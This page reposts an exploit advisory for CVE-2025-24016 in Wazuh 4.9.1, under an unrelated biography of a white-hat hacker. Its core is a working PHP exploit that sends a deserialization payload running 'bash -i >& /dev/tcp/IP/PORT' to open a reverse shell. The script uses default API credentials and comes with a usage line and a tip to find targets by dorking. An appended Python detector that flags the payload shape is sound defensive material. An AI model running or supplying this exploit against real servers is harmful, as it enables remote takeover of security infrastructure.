Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.


=============================================================================================================================================
| # Title : Wazuh v 4.9.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wazuh.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description:

This PHP script exploits the Remote Code Execution (RCE) vulnerability in the Wazuh server (referenced in the script as CVE-2025-24016).
It sends a request to the target server with a crafted payload that makes the target open a reverse shell back to the IP and port supplied on the command line.

[+] Save the code as poc.php.

[+] Usage : php poc.php -u https://<worker-server>:55000/security/user/authenticate/run_as -i 192.168.1.10 -p 4444

[+] Payload :

<?php

// Error logging configuration
ini_set('log_errors', 1);
ini_set('error_log', 'php_errors.log');
date_default_timezone_set('UTC');

// Coloured terminal output
function color_print($text, $color = null) {
    switch ($color) {
        case 'error':
            return "\033[1;31m$text\033[0m"; // red
        case 'warning':
            return "\033[1;33m$text\033[0m"; // yellow
        case 'success':
            return "\033[1;32m$text\033[0m"; // green
        case 'info':
            return "\033[1;36m$text\033[0m"; // cyan
        default:
            return $text;
    }
}

// Print runtime versions
function version_check() {
    try {
        $req_version = phpversion(); // PHP version
        $pyfiglet_version = '2.5.0'; // hard-coded value; nothing is actually queried
        echo "Required versions:\n";
        echo "PHP: $req_version\n";
        echo "PyFiglet: $pyfiglet_version\n";
    } catch (Exception $e) {
        echo "Error checking versions: " . $e->getMessage() . "\n";
    }
}

// Validate the IP address
function check_ip($ip) {
    if (filter_var($ip, FILTER_VALIDATE_IP)) {
        return true;
    } else {
        echo color_print("Invalid IP: $ip", 'error') . "\n";
        return false;
    }
}

// Validate the port number
function check_port($port) {
    if (is_numeric($port) && $port > 0 && $port <= 65535) {
        return true;
    } else {
        echo color_print("Invalid port: $port", 'error') . "\n";
        return false;
    }
}

// Validate the URL
function check_url($url) {
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        return true;
    } else {
        echo color_print("Invalid URL. Make sure it starts with http:// or https://", 'error') . "\n";
        return false;
    }
}

// Parse the command-line arguments
function parse_args() {
    global $argv;
    $args = getopt('u:i:p:user::pass::c::n::');
    return $args;
}

function main() {
    $args = parse_args();

    // Make sure the required arguments are present
    if (!isset($args['u']) || !isset($args['i']) || !isset($args['p'])) {
        echo color_print("You must provide URL, IP and Port!", 'error') . "\n";
        exit(1);
    }

    if (!check_ip($args['i']) || !check_port($args['p']) || !check_url($args['u'])) {
        exit(1);
    }

    version_check();

    echo "Wazuh RCE - CVE-2025-24016\n";
    echo "Author: Jessie\n";
    echo "Credits: Aiman, Cahyo, Ihsan & Arch\n";

    // Build the payload
    $payload = [
        "__unhandled_exc__" => [
            "__class__" => "os.system",
            "__args__" => [
                "bash -i >& /dev/tcp/{$args['i']}/{$args['p']} 0>&1"
            ]
        ]
    ];

    $headers = [
        "Content-Type: application/json",
        "X-Header-Name: Custom-Header"
    ];

    // Credentials
    $username = $args['user'] ?? 'wazuh-wui';
    $password = $args['pass'] ?? 'MyS3cr37P450r.*-';

    // Send the POST request
    $url = $args['u'];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($status_code != 200) {
        echo color_print("Request failed with status: $status_code", 'error') . "\n";
        if (strpos($response, 'Unauthorized') !== false) {
            echo color_print("Authentication failed", 'error') . "\n";
        } else {
            echo color_print("Unexpected response: $response", 'error') . "\n";
        }
        exit(1);
    }

    echo color_print("Request sent successfully!", 'success') . "\n";
    echo "Response: " . color_print($response, 'info') . "\n";

    // Wait for the callback
    echo color_print("Waiting for the reverse shell to connect to {$args['i']}:{$args['p']}", 'info') . "\n";
    sleep(5); // give the target time to connect

    // Starts a local interactive bash; this does not itself listen for the callback
    $command = "bash -i";
    $reverse_shell = shell_exec($command);
    if ($reverse_shell === null) {
        echo color_print("Failed to open shell", 'error') . "\n";
    } else {
        echo color_print("Reverse shell opened successfully!", 'success') . "\n";
    }
}

main();

?>
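As an added defender-side example (not part of indoushka's PoC and not Wazuh's own code), the following Python flags the payload shape the script above sends: a JSON object whose `__unhandled_exc__` entry names a callable in `__class__` and its arguments in `__args__`. It walks arbitrarily nested JSON so a gadget buried inside another field is still found, and it runs over a constructed tab-separated request log; the log layout, the field names and the SUSPICIOUS_CALLABLES list are assumptions of the example, not anything Wazuh ships. Wazuh's cluster protocol uses the same marker to pass exceptions between nodes, so this check is meant for bodies arriving at the API from clients rather than for cluster-internal traffic; the WazuhError line in the sample shows why the callable name, and not the key alone, decides whether a line is an alert.

```python
import json
from typing import Any, Iterator

# Marker key of Wazuh's internal JSON object encoding. The PoC above abuses
# the '__unhandled_exc__' form to name a callable ('__class__') and its
# arguments ('__args__'); a request body from an API client has no reason
# to carry it.
GADGET_KEY = "__unhandled_exc__"

# Dotted prefixes / names that should never appear as '__class__' in a
# request body. Constructed for this example, not a list Wazuh provides.
SUSPICIOUS_CALLABLES = ("os.", "subprocess.", "builtins.", "eval", "exec")


def walk(node: Any) -> Iterator[dict]:
    """Yield every dict nested anywhere inside a decoded JSON value."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from walk(item)


def find_gadgets(body: str) -> list[dict]:
    """Return one finding per '__unhandled_exc__' object in a JSON body.

    Bodies that are not valid JSON produce no findings: they would never
    reach the object decoder in the first place.
    """
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return []
    findings = []
    for obj in walk(data):
        inner = obj.get(GADGET_KEY)
        if not isinstance(inner, dict):
            continue
        cls = str(inner.get("__class__", ""))
        findings.append({
            "class": cls,
            "args": inner.get("__args__", []),
            # A bare exception name is what Wazuh itself emits; a module path
            # into os/subprocess/builtins is the injection shape.
            "suspicious": any(cls == s or cls.startswith(s) for s in SUSPICIOUS_CALLABLES),
        })
    return findings


# Constructed request-log sample (tab separated: time, source IP, method,
# path, JSON body). Assumed layout, not real Wazuh log output.
SAMPLE_LOG = [
    "2025-03-01T10:00:00Z\t10.0.0.5\tPOST\t/security/user/authenticate/run_as\t"
    '{"user_id": "alice"}',
    "2025-03-01T10:00:01Z\t198.51.100.7\tPOST\t/security/user/authenticate/run_as\t"
    '{"__unhandled_exc__": {"__class__": "os.system", "__args__": ["id"]}}',
    "2025-03-01T10:00:02Z\t10.0.0.8\tGET\t/agents\t",
    "2025-03-01T10:00:03Z\t10.0.0.9\tPOST\t/cluster/status\t"
    '{"__unhandled_exc__": {"__class__": "WazuhError", "__args__": [1000]}}',
]


def scan_log(lines: list[str]) -> list[dict]:
    """Attach each finding to the request that carried it."""
    alerts = []
    for line in lines:
        parts = line.split("\t", 4)
        if len(parts) < 5:
            continue
        ts, src, method, path, body = parts
        for finding in find_gadgets(body):
            alerts.append({"ts": ts, "src": src, "method": method, "path": path, **finding})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        flag = "ALERT" if alert["suspicious"] else "note "
        print(f'{flag} {alert["ts"]} {alert["src"]} {alert["path"]} class={alert["class"]}')
```

Run as-is it prints one ALERT for the `os.system` body from 198.51.100.7 and one informational line for the `WazuhError` body; in a real deployment the same `find_gadgets` call can sit in a WAF or reverse-proxy rule in front of port 55000, where rejecting any `__unhandled_exc__` from an external client is the simpler policy.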


Greetings to :
===================================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================